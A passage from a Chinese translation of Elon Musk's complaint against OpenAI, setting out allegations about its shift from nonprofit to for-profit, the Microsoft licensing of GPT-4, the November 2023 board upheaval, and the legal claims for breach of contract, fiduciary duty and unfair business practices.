Inc.从非营利组织转变为营利公司。经过几周的讨论，马斯克对布洛克曼、苏茨克沃博士和奥特曼说：“要么自己去做别的事情，要么继续以非营利形式运作OpenAI。在你们作出明确承诺留下，或我只是在无偿资助一个创业公司之前，我不会再对OpenAI进行资助。讨论到此为止。”  </p></li><li><p>作为回应，奥特曼对马斯克说：“我对非营利结构依然充满热情！”最终，布洛克曼和苏茨克沃博士也向马斯克表达了他们决定继续保持非营利结构，并承诺在接下来的一年里致力于筹款以支持这一非营利事业。  </p></li><li><p>2018年2月21日，马斯克卸任OpenAI, Inc.的联合主席职务。尽管如此，马斯克依然根据创立协议，继续为OpenAI, Inc.做出贡献。例如，在2018年，马斯克向OpenAI, Inc.捐赠了大约350万美元。他还继续从布洛克曼、苏茨克沃博士和奥特曼那里获得OpenAI, Inc.的最新进展信息。  </p></li><li><p>2018年4月，奥特曼向马斯克发送了OpenAI宪章的草案，并征求他的意见。草案阐述了OpenAI的使命是确保人工通用智能（AGI）“造福全人类”。它声明：“我们承诺，将利用我们对AGI部署的任何影响力，确保其用于全人类的利益，并避免启用可能对人类造成伤害或不当集中权力的AI或AGI的用途。我们的首要责任是对人类负责。我们预计需要动员大量资源来完成我们的使命，但我们将始终谨慎行事，以最小化可能影响广泛利益的利益冲突……”  </p></li><li><p>2019年3月11日，OpenAI, Inc.宣布将创建一个营利子公司：OpenAI, L.P.潜在投资者在条款摘要的顶部被告知一个“重要警告”，即营利实体“存在的目的是为了推进OpenAI Inc.（非营利组织）的使命，确保安全的人工通用智能（AGI）的开发并造福全人类。普通合伙人对这一使命和OpenAI Inc.宪章中提出的原则的责任，优先于任何盈利的义务。”因此，投资者被明确告知：“将对OpenAI LP的投资视作捐赠是明智的选择。”  </p></li><li><p>宣布之后，马斯克联系奥特曼，要求他“明确我对OpenAI营利部分没有财务利益。”然而，马斯克继续支持OpenAI, Inc.这个非营利组织，在2019年又捐赠了348万美元。  </p></li><li><p>2020年9月22日，OpenAI宣布它已将某些预AGI技术独家授权给微软。根据创立协议，OpenAI在其网站上声明，AGI——被描述为“在大多数经济有价值的工作中能超越人类表现的高度自主系统”——“不包括在与微软的知识产权许可和其他商业条款中，这些仅适用于预AGI技术。”然而，OpenAI的董事会“负责决定我们何时实现了AGI。”</p></li></ol><h3 id="E-OpenAI的企业结构演变"><a href="#E-OpenAI的企业结构演变" class="headerlink" title="E. OpenAI的企业结构演变"></a>E. OpenAI的企业结构演变</h3><ol start="70"><li><p>自OpenAI, L.P.宣布成立之后的几年里，OpenAI的企业结构变得日益复杂。2020年9月17日，OpenAI, L.L.C.在特拉华州注册成立。OpenAI, L.L.C.的唯一成员是OpenAI OpCo, LLC。  </p></li><li><p>OpenAI OpCo, LLC于2018年9月19日在特拉华州注册成立，其唯一成员是OpenAI Global, LLC。  </p></li><li><p>OpenAI Global, LLC于2022年12月28日在特拉华州注册成立。据资料显示，OpenAI Global, LLC与OpenAI, L.P.相同，是一家设有盈利上限的营利性实体。OpenAI Global, LLC有两个成员：微软公司和OAI Corporation, LLC。</p></li><li><p>OAI Corporation, LLC是一家在特拉华州注册成立的有限责任公司，其唯一成员是OpenAI Holdings, LLC。  </p></li><li><p>OpenAI Holdings, LLC于2023年3月17日在特拉华州注册成立，其成员包括OpenAI, Inc.、Aestas, LLC及其他个人成员。 </p></li><li><p>据了解，OpenAI, Inc.通过其一般合伙人OpenAI GP, L.L.C.管理OpenAI, L.P.和OpenAI Global, LLC，该公司于2018年9月19日在特拉华州作为有限责任公司注册。OpenAI GP, L.L.C.完全由OpenAI, Inc.（非盈利组织）所有，并受该非盈利组织的董事会控制。根据OpenAI的宪章，董事会对股东无义务，其唯一的义务是对人类负责。</p></li><li><p>据资料显示，最初至少OpenAI, L.P.和OpenAI GP LLC是为了支持和资助OpenAI, Inc.的非盈利使命而建立的，正如创立协议中所述。</p></li></ol><h3 id="F-OpenAI技术的发展——从人工智能到通用人工智能"><a href="#F-OpenAI技术的发展——从人工智能到通用人工智能" class="headerlink" title="F. OpenAI技术的发展——从人工智能到通用人工智能"></a>F. OpenAI技术的发展——从人工智能到通用人工智能</h3><ol start="77"><li><p>OpenAI的早期工作很大程度上仿效了DeepMind。OpenAI采用强化学习来玩游戏。不过，OpenAI选择的是Dota 2，这是一个比国际象棋复杂得多的策略性视频游戏。OpenAI的团队迅速开发出了一个新模型，击败了当时的世界冠军队伍，证明了自我对弈的强化学习可以在复杂的任务上实现超人的表现。  </p></li><li><p>同时，在谷歌，一个名为Transformer的算法被发明出来，解决了深度学习在处理长文本序列时遇到的多个问题。这个算法是一个“大型语言模型”的示例，被设计用来将一种语言的文本翻译成另一种语言，它通过建立源语言中词汇之间的联系，并将这些联系映射到目标语言中。  </p></li><li><p>OpenAI的研究人员继续进行这项研究，并迅速取得了另一个惊人的成果：利用谷歌Transformer架构的前半部分，可以预训练一个深度神经网络在大量文本语料库上，用于生成新文本。2018年1月，OpenAI发布了这个生成式预训练转换器（GPT）的源代码和训练好的模型，以及一篇详细描述该模型及其能力的论文。  </p></li><li><p>2019年，OpenAI发布了第二代模型GPT-2。这次发布同样附有一篇详细的论文，指出与之前的模型不同，GPT-2不需要针对特定任务进行训练，而是“当一个大型语言模型在足够大且多样化的数据集上训练后，它能够在许多领域和数据集上表现出色。”这些模型证明了它们与之前的AI系统大不相同，它们可以简单地通过自然语言“请求”来执行新任务。  </p></li><li><p>如创立协议所预期，OpenAI公开发布了GPT-2的完整版本。值得注意的是，尽管“人们发现GPT-2的输出结果令人信服”，“GPT-2可以被用于不当用途的微调”，并且“检测GPT生成的文本具有挑战性”，但OpenAI还是发布了完整的开放版本，希望这样做“对未来强大模型的开发者们有所帮助”。这次发布伴随着一篇由OpenAI科学家以及独立的社会和技术科学家共同撰写的详细论文，这篇论文解释了公开发布模型相比保持封闭所带来的众多好处。  </p></li><li><p>他们的发布确实对未来强大模型的开发者们有所帮助。围绕OpenAI发布的模型，涌现出了整个社区，致力于增强和扩展这些模型。这些社区遍及开源、草根努力和商业实体。  </p></li><li><p>2020年，OpenAI宣布了其模型的第三版GPT-3。它使用了“1750亿参数，是之前任何非稀疏语言模型的十倍多”。OpenAI再次通过发布研究论文来宣布这一模型的开发，论文详细描述了其完整实现，以便其他人能够在此基础上进一步构建。  </p></li><li><p>2022年，谷歌的研究人员利用这些成果展示了一个名为“链式思考提示”的小改动，能够使“大型语言模型执行复杂推理”。东京大学和谷歌的研究人员迅速在谷歌的成果上进行了扩展，展示了OpenAI的GPT-3能够通过简单地在每个答案前添加“让我们一步步来思考”，像人类一样对全新的问题进行逐步推理。</p></li><li><p>通向人工生成智能的道路变得清晰可见，而且实现它的时间正在显著缩短。  </p></li><li><p>2023年3月14日，OpenAI发布了其模型的新一代GPT-4。这一代不仅具备推理能力，而且在推理方面的表现超过了平均水平的人类。GPT-4在统一律师考试中的得分位于90百分位，在GRE语言评估中的得分位于99百分位，甚至在高级侍酒师考试中得分为77%。根据OpenAI自己的客观评估，GPT-4已经能够在广泛的经济价值任务上展现出超越人类的智能。  </p></li><li><p>这一发展并没有被研究界忽视。在一篇题为“人工通用智能的火花：GPT-4的早期实验”的详细分析中，微软的研究人员指出，“GPT-4能够解决跨越数学、编程、视觉、医学、法律、心理学等多个领域的新颖且困难的任务，无需任何特定提示。在所有这些任务中，GPT-4的表现非常接近人类水平，通常远超之前的模型，如基于GPT-3.5的ChatGPT。”  </p></li><li><p>他们将GPT-4的表现与基于GPT-3的系统进行了比较，发现“与GPT-4的输出相比，根本无法相提并论。”在数学问题上，他们指出，“GPT-4给出的解决方案是正确的，论证合理，而基于GPT-3的ChatGPT则给出了错误的解决方案，这在人类中会被视为对函数反演概念的理解不足。”在另一个例子中，他们指出，“GPT-4给出了正确的解决方案，而ChatGPT开始时就通过重新排列项而没有明确的方向或目的，最终得出了错误的解决方案。”  </p></li><li><p>微软的科学家们承认，GPT-4“达到了一种通用智能的形态”，并且“鉴于GPT-4的能力范围和深度，我们认为它可以合理地被看作是人工通用智能（AGI）系统的一个早期（尽管还不完整）版本。”</p></li></ol><h3 id="G-创始协议在2023年被违反"><a href="#G-创始协议在2023年被违反" class="headerlink" title="G. 创始协议在2023年被违反"></a>G. 创始协议在2023年被违反</h3><ol start="90"><li><p>达到人工通用智能（AGI）的门槛后，根据创始协议，开发AGI的初衷应当是为了人类的利益，而非任何单一公司或个人的利益。然而，开发者们却严重偏离了这一使命，违反了创始协议。GPT-4是一个完全封闭的模型，其内部设计被严格保密，未发布任何代码。OpenAI没有公布任何描述其设计细节的论文，仅发布了宣传其性能的新闻稿。GPT-4的内部机制只为OpenAI和据信是微软的少数人所知。因此，GPT-4与“开放的人工智能”原则背道而驰。其封闭性完全是出于商业专利的考虑：如果OpenAI按照创始协议要求，免费向公众开放技术，微软就无法通过出售GPT-4来获得巨额利润。违背创始协议的精神，被告选择将GPT-4作为专利技术，以最大化全球最大企业的利润。此外，OpenAI的开发过程被严格保密，公众只能通过零散的传言和通讯片段猜测将要发布的内容。 </p></li><li><p>研究人员指出，基于GPT架构的人工智能的一个局限性在于它们一次只能生成一个输出片段，无法进行“回溯”。这一问题在人工智能领域已经被识别，并且在其他应用场景中已基本得到解决。例如，在路径搜索和迷宫探索任务中，人工智能需要能够识别正确的路径，即使途中遇到死胡同。执行此类任务的标准算法被称为“A*”算法。  </p></li><li><p>路透社报道，OpenAI正在秘密开发一种名为Q*的算法。尽管Q*的具体细节尚不明确，但据路透社报道，几名OpenAI的员工发出了一封警告信，表达了对Q*潜在能力的担忧。似乎Q*现在或将来可能成为OpenAI开发的更为显著和引人注目的人工通用智能（AGI）的一部分。作为AGI，它明显不应受限于OpenAI与微软的许可协议，而应为公众利益而被公开。  </p></li><li><p>关于与微软的许可协议，OpenAI, Inc.的董事会有权决定OpenAI是否已经实现了AGI。在一系列震惊人心的事件中，详细描述如下，OpenAI, Inc.的董事会的大多数成员在2023年11月22日被迫辞职，他们的继任者据信是由Altman先生和微软直接挑选的。  </p></li><li><p>2023年11月17日，OpenAI, Inc.的董事会解雇了Altman先生。OpenAI在一篇博客文章中宣布Altman先生的离职是在董事会进行了深思熟虑的审查过程之后做出的决定，原因是他在与董事会的沟通中并不总是诚实，这妨碍了董事会执行其职责。董事会对他继续领导OpenAI失去了信心。  </p></li><li><p>Brockman先生也被从董事会中移除，但被告知他将在OpenAI保留一定角色。  </p></li><li><p>当时，董事会成员包括Helen Toner、Adam D’Angelo、Tasha McCauley、Dr. Sutskever、Brockman先生和Altman先生。Toner女士除了是董事会成员外，还是人工智能治理中心（GovAI）的研究员和顾问，以及乔治城大学安全与新兴技术中心的战略总监。McCauley女士是兰德公司的高级管理科学家，该公司专注于公共政策决策的非营利组织，她也是GovAI的顾问。D’Angelo先生——Altman先生复职后唯一留下的董事会成员——是一名技术首席执行官和企业家。</p></li><li><p>故意将多名具有丰富人工智能政策经验的学者和公共政策专家纳入OpenAI, Inc.的董事会，其中大多数人对公司没有财务利益，这是一项深思熟虑的决策。这种由具有强烈公共服务记录且在财务上无利益关系的董事会成员组成，确保了董事会将非营利组织的主要受益者——人类——置于财务成功之上。这一保障措施旨在进一步推进OpenAI, Inc.的非营利使命和创始协议：安全地创造能够惠及全人类的AGI，而非仅仅追求盈利公司的金钱利益。  </p></li><li><p>据了解，Altman先生被解雇的部分原因是OpenAI在实现AGI方面取得的突破。实际上，新闻报道显示，OpenAI董事会成员和高层管理人员之间就安全问题以及OpenAI下一代技术Q*可能构成的潜在威胁存在分歧。  </p></li><li><p>Altman先生被解雇的消息迅速传开。董事会宣布Altman先生被解雇后，Brockman先生宣布他将与Altman先生一同离开OpenAI。  </p></li><li><p>当微软首席执行官萨提亚·纳德拉得知Altman先生被解雇时，据报道他非常愤怒。作为OpenAI营利部门49%的股东，纳德拉先生认为，在解雇Altman先生之前应该咨询微软。然而，当时，除了Altman先生外，OpenAI, Inc.的董事会与微软没有联系，也没有对营利部门投资者的受托责任。据了解，Altman先生是微软和OpenAI, Inc.之间的主要联络人。 </p></li><li><p>纳德拉先生邀请Altman先生和Brockman先生领导一个新的微软人工智能研究实验室，不受OpenAI, Inc.的人道主义使命的限制。纳德拉明确表示，离开OpenAI的员工将受到欢迎，加入微软的新实验室，并享有相同的薪水。  </p></li><li><p>微软有信心，通过其在OpenAI营利部门的大量所有权，如果公司停止存在，它可以完全隔离OpenAI, Inc.的研究。事实上，在Altman先生被解雇后不久的一次采访中，纳德拉先生表示：“我们对自己的能力非常有信心。我们拥有所有的知识产权和所有的能力。如果OpenAI明天消失了，我真的不希望我们的任何客户担心，因为我们拥有继续创新的所有权利。不仅仅是为了提供产品，我们还可以继续我们自己的合作伙伴关系。我们拥有人才、计算能力、数据，我们拥有一切。”  </p></li><li><p>尽管微软就其在没有OpenAI的情况下运作的能力发表了声明，微软从未放弃让Altman先生重新成为OpenAI, Inc.的首席执行官的计划。在Altman先生被解雇的几天后，OpenAI, Inc.的董事会面临来自律师和主要股东（包括微软）的压力，要求恢复Altman先生的职位。  </p></li><li><p>Toner女士在努力恢复Altman先生的职位中受到了特别的针对。在这些努力中，一名OpenAI的律师告诉Toner女士，如果因Altman先生被解雇而导致OpenAI失败，她和董事会可能面临违反对投资者的受托责任的指控。  </p></li><li><p>然而，OpenAI, Inc.的董事会从未对投资者承担受托责任。事实上，对营利部门的所有投资者都被告知，公司对其使命的责任优先于对其投资者的责任，OpenAI, Inc.的网站清楚地表明它只对人类承担受托责任。  </p></li><li><p>Toner女士，将律师的行为描述为一种恐吓策略，认为Altman先生的持续移除实际上将通过促进人类安全而非利润来推进公司的使命。然而，这并没有阻止股东和Altman先生推动他的复职。  </p></li><li><p>此外，微软对OpenAI, Inc.及其董事会拥有相当大的胁迫力。在Altman先生被解雇的期间，纳德拉首席执行官谈到微软与OpenAI的关系时说：“我们就在那里。我们在他们下面，他们上面，他们周围。我们做内核优化，我们构建工具，我们构建基础设施。所以我认为很多工业分析师都在说，‘哦，哇，这真的是微软和OpenAI之间的联合项目。’事实是，正如我所说，我们在所有这些方面都非常自给自足。”  </p></li><li><p>此外，在解雇时，微软只支付了其向OpenAI承诺的100亿美元投资中的一小部分，这给了微软对“独立”的非营利董事会严重的影响力。此外，如果微软停止提供OpenAI依赖的云计算系统，该公司将无法运作。  </p></li><li><p>Altman先生和微软对董事会的压力一直持续到11月21日，当时Altman先生被重新任命为OpenAI, Inc.的首席执行官，Brockman先生重新加入成为总裁。Altman先生返回的一个条件是Toner女士、McCauley女士和Sutskever博士从董事会辞职。  </p></li><li><p>据了解，Altman先生返回后亲自挑选了一个新董事会，这个董事会缺乏类似的技术专长或任何在人工智能治理方面的实质背景，这是之前的董事会特意设计的。D’Angelo先生，一位技术首席执行官和企业家，是Altman先生返回后唯一留下的前董事会成员。新董事会由在以利润为中心的企业或政治方面拥有更多经验，而非在人工智能伦理和治理方面的成员组成。据报道，他们也是“Altman的忠实粉丝”。新董事会的两名成员是Bret Taylor和Larry Summers。Taylor先生在硅谷并不陌生，并且深度参与了各种以利润为导向的湾区创业项目。2024年2月14日，Taylor先生和前谷歌高管Clay Bavor启动了一家专注于为企业构建人工智能聊天机器人的初创公司。Summers博士是一位经济学家，据了解，在2023年11月之前，他没有参与过基于人工智能的创业项目的经验。微软还获得了董事会的一个观察员席位，从中可以密切关注其表面上的非营利金鸡母。 </p></li><li><p>随着Altman先生的重新任命和董事会的重组，OpenAI的公司结构，原本设计为非营利部门、营利部门、董事会和首席执行官之间的制衡系统，以确保非营利使命得以执行，一夜之间崩溃。OpenAI, Inc.曾经精心打造的非营利结构被纯粹以利润为导向的首席执行官和在AGI及人工智能公共政策方面技术专长较差的董事会所取代。董事会现在为微软保留了一个观察员席位。随着这一重组，OpenAI, Inc.放弃了其为了广泛人类利益开发AGI的非营利使命，从而使其不落入一个巨大的、权力过度集中的盈利公司手中。  </p></li><li><p>OpenAI, Inc.董事会在人工智能技术专长、中立性和对OpenAI, Inc.非营利使命的承诺对OpenAI, Inc.的使命尤为重要，因为董事会决定OpenAI是否已实现AGI，以便于其与微软的许可协议。这意味着董事会的任务是确定OpenAI最强大和最先进的技术是否实际上不在微软的独家许可范围内。鉴于微软在阻止公众进入门槛方面拥有巨大的财务利益，OpenAI, Inc.新的被俘获、冲突和顺从的董事会将有充分的理由延迟做出OpenAI已实现AGI的判断。相反，就像《安妮》中的“明天”一样，OpenAI实现AGI的时刻永远是一天之遥，确保微软将获得对OpenAI最新技术的许可，而公众将被排除在外，这与创始协议的初衷完全相反。  </p></li><li><p>OpenAI的行为可能对硅谷产生深远影响，若其行为得以成立，将标志着科技初创企业的范式转变。我们必须反思这里发生的事情：一个非盈利初创企业募集了数千万美元的资金，其明确目标是为了公众利益开发人工通用智能（AGI）技术。然而，在接近实现其成立初衷的重要里程碑之际，这家公司却变成了世界上最大企业的封闭、盈利合作伙伴，从而使被告人获得了个人利益。如果这种商业模式成立，它将彻底改变加利福尼亚乃至更广范围内的风险投资实践。与其从一开始就作为盈利实体，聪明的投资者反而会创建非盈利机构，利用税前捐款来支持研发，然后在技术成熟并验证后，将其转移到新的盈利企业中，以此丰富自己及其追求利润最大化的合作伙伴。这不是加利福尼亚或美国其他地方法律应有的运作方式，本法院也不应成为首个持相反判决的法院。</p></li><li><p>进一步理解这一点的重要性在于，如果OpenAI的新商业模式成立，那么投资者通过向非盈利组织“投资”的每一美元，实际上能从州和联邦政府那里以减税形式回收约50美分，因此他们每投资1美元的实际成本仅为50美分。然而，通过OpenAI的新商业模式，他们能够获得与那些以传统方式投资于盈利公司的投资者相同的“盈利”前景，而这些传统投资者并不会立即享受税务减免，其实质是由政府乃至最终由公众财政支持。从投资角度看，与采用OpenAI新商业模式的实体竞争，就像是在一场篮球赛中对手的得分是你的两倍。如果本法院认可OpenAI在此的行为，任何希望在硅谷保持竞争力的初创企业实际上都将被迫遵循OpenAI的策略，这将成为初创企业的标准操作流程，损害合法非盈利机构、政府税收以及最终加利福尼亚及更广泛地区的民众。值得注意的是，OpenAI的盈利分支最近的估值接近800亿美元。</p></li></ol><h3 id="H-2023年11月至今：奥特曼的OpenAI"><a href="#H-2023年11月至今：奥特曼的OpenAI" class="headerlink" title="H. 2023年11月至今：奥特曼的OpenAI"></a>H. 2023年11月至今：奥特曼的OpenAI</h3><ol start="115"><li><p>公众对董事会所谓的“审议性审查过程”究竟揭示了什么，从而导致了奥特曼先生最初被解雇，仍然一无所知。但有一点对马斯克先生和广大公众而言是明确的：OpenAI已经放弃了其“不可撤销”的非盈利使命，转而追求利润。许多领袖和知识分子已公开对OpenAI变成“封闭、盈利AI”的情况表示讽刺和遗憾。</p></li><li><p>例如，2023年11月29日，麻省理工学院的经济学家在《洛杉矶时报》上发表评论，对OpenAI新的盈利导向表示担忧。他们表示，“颠覆和无节制增长已成为科技行业的信条，而奥特曼是其最狂热的高级祭司之一。”经济学家们强调，新董事会更有可能允许奥特曼尽可能快地扩大OpenAI，不顾社会成本的严重性。</p></li><li><p>公民公益（Public Citizen），一家非盈利消费者倡导组织的总裁，今年早些时候向加利福尼亚州总检察长罗布·邦塔（Rob Bonta）写了一封公开信，提出了对OpenAI的盈利子公司是否不当地控制着非盈利母公司，或者非盈利母公司的目标已经在奥特曼和微软的领导下转向盈利的担忧。信中建议，如果非盈利机构放弃其原始使命，那么应当解散它，并将资产转给另一家慈善机构。</p></li><li><p>《连线》杂志2024年1月的调查发现，OpenAI最近还限制了公众访问以前可获得的“关键文档”。按照OpenAI最初的透明承诺，自成立以来，其IRS文件显示任何公众人士都可以查阅其治理文件、财务报表和利益冲突规则的副本。然而，当《连线》请求这些文件时，OpenAI表示已更改其政策。因此，尽管OpenAI长期标榜其对透明度的承诺，但公众却无法获取揭示2023年11月事件的信息。</p></li><li><p>获取OpenAI的文件能够让公众了解到它是否改变了治理结构以取悦微软和其他股东。至少，为了适应微软在董事会中的席位，必须进行了某些调整，而现在奥特曼先生据报道正在与中东投资者谈判，试图筹集高达7万亿美元，以建立一个全球AI芯片制造厂网络。如果微软的100亿美元投资就足以让它在董事会中占有一席之地，那么这些新的潜在投资可能赋予投资者在OpenAI, Inc.上的影响力将是难以想象的。特别是当其中一位潜在捐赠者是阿拉伯联合酋长国的国家安全顾问，且鉴于阿拉伯联合酋长国与中国的联系，美国官员对此表示担忧时，这种情况尤其令人不安。此外，奥特曼先生被引述讨论将阿拉伯联合酋长国作为一个“监管沙盒”，在此测试AI技术的可能性。</p></li><li><p>此外，获取OpenAI的利益冲突政策对于了解董事会控制奥特曼先生利用OpenAI推动自己经济利益的能力至关重要，迄今为止，这种控制似乎尚未受到限制。例如，在2019年奥特曼先生担任CEO期间，OpenAI签署了一份意向书，计划购买价值5100万美元的芯片，这些芯片来自一家奥特曼先生大量投资的初创公司。</p></li><li><p>尽管OpenAI, Inc.曾是基于与公众开放沟通的安全、负责任AGI开发的先锋，但如今它已经闭门不出，将其盈利子公司的最大投资者引入了唯一对人类负有受托责任的董事会，并继续秘密地朝着以利润为中心的未来前进，这对人类可能产生灾难性的后果。</p></li><li><p>马斯克先生与奥特曼先生和布罗克曼先生共同创立并资助了OpenAI, Inc.，依赖创始协议确保AGI将惠及人类，而非盈利公司。然而随着2023年的事态发展，他对OpenAI, Inc.的贡献被扭曲，以利益被告和世界上最大的公司。这是对创始协议的严重背叛，彻底颠覆了该协议的精神，并扭曲了OpenAI, Inc.的使命。想象一下，你向一个宣称其使命是保护亚马逊雨林的非盈利组织捐款，但后来这个组织创建了一个盈利的亚马逊伐木公司，使用这些捐款来清除雨林。这正是OpenAI, Inc.的故事。</p></li></ol><h1 id="第一项诉因"><a href="#第一项诉因" class="headerlink" title="第一项诉因"></a>第一项诉因</h1><h2 id="违反合同"><a href="#违反合同" class="headerlink" title="违反合同"></a>违反合同</h2><p><strong>针对所有被告</strong></p><ol start="123"><li><p>原告重新提出并仅引用本诉状中对其违约主张必需的段落。</p></li><li><p>自OpenAI, Inc. 2015年成立至2020年9月期间，原告投入了数千万美元，并就研究方向提供了关键性建议，同时在吸引世界级人才加入OpenAI, Inc.方面发挥了核心作用。这一切都是基于并作为对创始协议的回报，即：OpenAI, Inc.（a）将作为一个非营利机构开发AGI，以造福人类，而非追求最大化股东利润的营利公司；（b）将开放源代码，仅在考虑到相反的安全因素时做出平衡，并不会因专有商业理由而保持技术的封闭和秘密。这一创始协议不仅记录在OpenAI, Inc.的创立章程中，还在原告与被告多年间的众多书面通信中有所体现，例如：<br>a. “本公司的具体宗旨是为与人工智能相关的技术研究、开发与分发提供资金支持。所产生的技术将惠及公众，公司将在适用的情况下开源技术以利公众。公司成立的目的不是为了任何个人的私利。” 附件1第1页。<br>b. 奥特曼先生曾表示：“使命是创造首个通用人工智能，并将其用于个体赋能——即，这似乎是最安全的未来版本。更广泛地说，安全应当是首要考虑的……技术将由基金会拥有，并用于‘全世界的利益’。”原告回应：“全面同意。” 附件2第1页。</p></li><li><p>被告以多种单独且独立的方式违反了创始协议，包括但不限于：<br>a. 将GPT-4独家授权给微软，而微软的科学家们已将GPT-4“合理地视为是人工通用智能（AGI）系统的早期（尽管尚不完整）版本”，尽管之前已同意OpenAI将开发AGI以造福人类，而非为了某个营利公司的私人商业利益——更不用说是世界上最大的公司了。<br>b. 未向公众披露GPT-4的架构、硬件、训练方法和训练计算等细节，并通过在公众与GPT-4之间设置“付费墙”，要求使用时支付每个令牌的费用，以推进被告和微软自己的私人商业利益，尽管之前已同意OpenAI的技术将开源，仅在考虑到对立的安全因素时作出平衡。<br>c. 允许微软这一上市营利公司在OpenAI, Inc.的董事会中占有一席之地，并对OpenAI的非营利活动施加不当影响和控制，例如决定OpenAI, Inc.的技术是否以及在何种程度上对公众免费开放，以及判断OpenAI是否已达到AGI。</p></li><li><p>由于被告的违约行为，原告已遭受损失，其金额目前未知，但显著超过本法院管辖的最低限额35,000美元，并将在必要时在审判中予以证明。</p></li><li><p>原告还寻求并有权要求被告履行合同义务的具体执行。</p></li></ol><h1 id="第二项诉因"><a href="#第二项诉因" class="headerlink" title="第二项诉因"></a>第二项诉因</h1><h2 id="可信赖的承诺"><a href="#可信赖的承诺" class="headerlink" title="可信赖的承诺"></a>可信赖的承诺</h2><p><strong>针对所有被告</strong></p><ol start="128"><li><p>原告重申并引用仅对其可信赖的承诺主张所必需的本诉状段落。</p></li><li><p>为了诱使原告在数年间向OpenAI, Inc.投入数百万美元，并促使他投入大量时间及其他资源助力OpenAI, Inc.成立，正如本文所述，被告反复向原告承诺，包括书面承诺，即OpenAI（a）将作为一个非盈利机构开发AGI，目的是为了人类的利益，而不是作为一个追求最大化股东利润的盈利企业；（b）将开放源代码，只有在对立的安全考虑下才会进行权衡，而不会因为专有商业原因保持技术的封闭和秘密。</p></li><li><p>通过这样做，被告合理预期原告会（就像他实际上所做的）依赖他们的承诺，并向OpenAI, Inc.提供资金、时间及其他资源。</p></li><li><p>原告合理地依赖了被告的虚假承诺，这对他造成了损失，最终向OpenAI, Inc.提供了数千万美元的资金，以及他的时间和其他资源。这是在条件下进行的，即OpenAI将永久性地致力于为公众利益创造一个安全、开源的AGI，但后来OpenAI放弃了其“不可撤销”的非盈利使命，停止向公众提供基础信息，反而专门将其AGI算法献给并授权给世界上最大的盈利公司，这与被告对原告所作的承诺完全相反。</p></li><li><p>只有通过执行被告反复作出的承诺，才能避免不公。如果不授予具体执行，则至少被告必须赔偿等同于原告被误用的贡献金额以及创始协议预期的第三方受益人所受的损害金额，这一金额目前尚未知晓，如有必要，将在审判中证明。但该金额显著超过本法院管辖的最低限额35,000美元。</p></li></ol><h1 id="第三项诉因"><a href="#第三项诉因" class="headerlink" title="第三项诉因"></a>第三项诉因</h1><h2 id="违反受托责任"><a href="#违反受托责任" class="headerlink" title="违反受托责任"></a>违反受托责任</h2><p><strong>针对所有被告</strong></p><ol start="133"><li><p>原告重新陈述并引用本诉状中仅对其违反受托责任主张所必需的段落。</p></li><li><p>根据加利福尼亚州法律，被告对原告承担受托责任，包括有义务将原告的贡献用于其指定的目的。例如，参见加州商业与职业法典第17510.8节。被告反复违反了对原告的受托责任，具体包括：<br>   a. 使用原告提供的资金及这些资金资助的知识产权和衍生作品，用于直接违背双方协议的字面意义和明确意图的“盈利”目的，从而违反了被告向原告作出的合同承诺，同时也违背了被告对协议明确预期的第三方受益人——即公众——的承诺。例如，被告让GPT-4独家授权给微软，尽管微软的科学家已经表明，GPT-4“可以合理地被看作是人工普遍智能（AGI）系统的早期（虽然尚不完整）版本”，这违背了OpenAI, Inc.不可撤销的非盈利使命，即为人类利益而开发AGI。<br>   b. 未向公众披露关于GPT-4的架构、硬件、训练方法和训练计算等详细信息，并通过在公众与GPT-4之间设置“付费墙”，要求按使用量付费，以推进被告和微软自己的私人商业利益，尽管之前同意OpenAI的技术将开源，仅在安全考虑需要时进行平衡。<br>   c. 允许微软这一上市盈利公司在OpenAI, Inc.的董事会中占有一席之地，并对OpenAI, Inc.的非盈利活动施加不当影响和控制，包括决定是否以及在何种程度上向公众免费提供OpenAI的技术。</p></li><li><p>由于被告违反受托责任，原告及创始协议明确预期的第三方受益人遭受了损失，其金额目前不明，但显著超过本法院管辖的最低限额35,000美元，必要时将在审判中予以证明。</p></li><li><p>原告寻求并有权要求被告具体履行合同义务，作为对被告违反受托责任的补救措施。</p></li></ol><h1 id="第四项诉因"><a href="#第四项诉因" class="headerlink" title="第四项诉因"></a>第四项诉因</h1><h2 id="不公平商业行为-加利福尼亚商业与职业法典第17200条及随后条款"><a href="#不公平商业行为-加利福尼亚商业与职业法典第17200条及随后条款" class="headerlink" title="不公平商业行为 - 加利福尼亚商业与职业法典第17200条及随后条款"></a>不公平商业行为 - 加利福尼亚商业与职业法典第17200条及随后条款</h2><p><strong>针对所有被告</strong></p><ol start="137"><li><p>原告重申并引用本诉状中与其不公平商业行为主张相关的必要段落。</p></li><li><p>加利福尼亚商业与职业法典第17200条及随后条款规定，任何从事、已经从事或计划从事不公平商业行为的个人或实体，可以被法院下令禁止其继续这些行为。</p></li><li><p>被告通过错误地声称所有募集的资金都将用于创始协议中明确的基本目的，从原告和其他人那里募集捐款，从而进行了不公平竞争和其他不公平的商业行为。</p></li><li><p>若非被告的不公平竞争和其他不公平商业行为，原告不会向OpenAI, Inc.进行捐赠或作出其他贡献。</p></li><li><p>由于被告的行为，原告被误导，公众其他成员也很可能被误导。</p></li><li><p>在进行上述不公平竞争行为时，被告至少违反了加利福尼亚商业与职业法典第17510.8条。</p></li><li><p>由于被告的这些及其他行为，原告遭受了损失，并有权从被告及其共谋者那里回收因这些不公平竞争和其他不公平商业行为获得的所有收益和补偿。</p></li><li><p>原告有权要求返还和&#x2F;或没收被告在从事这些行为时所获得的所有资金，以及根据加利福尼亚商业与职业法典第17200条及随后条款规定的预判利息。原告进一步请求法院禁止被告将来再次进行此类活动，并要求法院下达强制具体履行的命令。</p></li></ol><h1 id="第五项诉因"><a href="#第五项诉因" class="headerlink" title="第五项诉因"></a>第五项诉因</h1><h2 id="账目审计"><a href="#账目审计" class="headerlink" title="账目审计"></a>账目审计</h2><p><strong>针对所有被告</strong></p><ol start="145"><li><p>原告重新陈述并引用本诉状中对其账目审计诉求所必需的段落。</p></li><li><p>如前所述，经过多年，被告向原告募集了数千万美元的捐款，并承诺OpenAI, Inc.将坚定不移地作为一个非营利机构，致力于为公众利益创造安全的人工通用智能（AGI），所有捐赠资金都将依照这一“不可撤销”的承诺使用。据了解，被告还基于同样的承诺从其他人那里募集了数千万美元的捐款。</p></li><li><p>与原告捐赠资金的明确目的相悖，正如本文所述，被告将从原告处收到的资金以及这些资金资助的知识产权和衍生作品用于“营利”目的，包括利益私人个体，很可能包括被告个人，这直接违背了双方协议的字面意义和明确意图。</p></li><li><p>由于被告掌握有关原告及其他人对OpenAI, 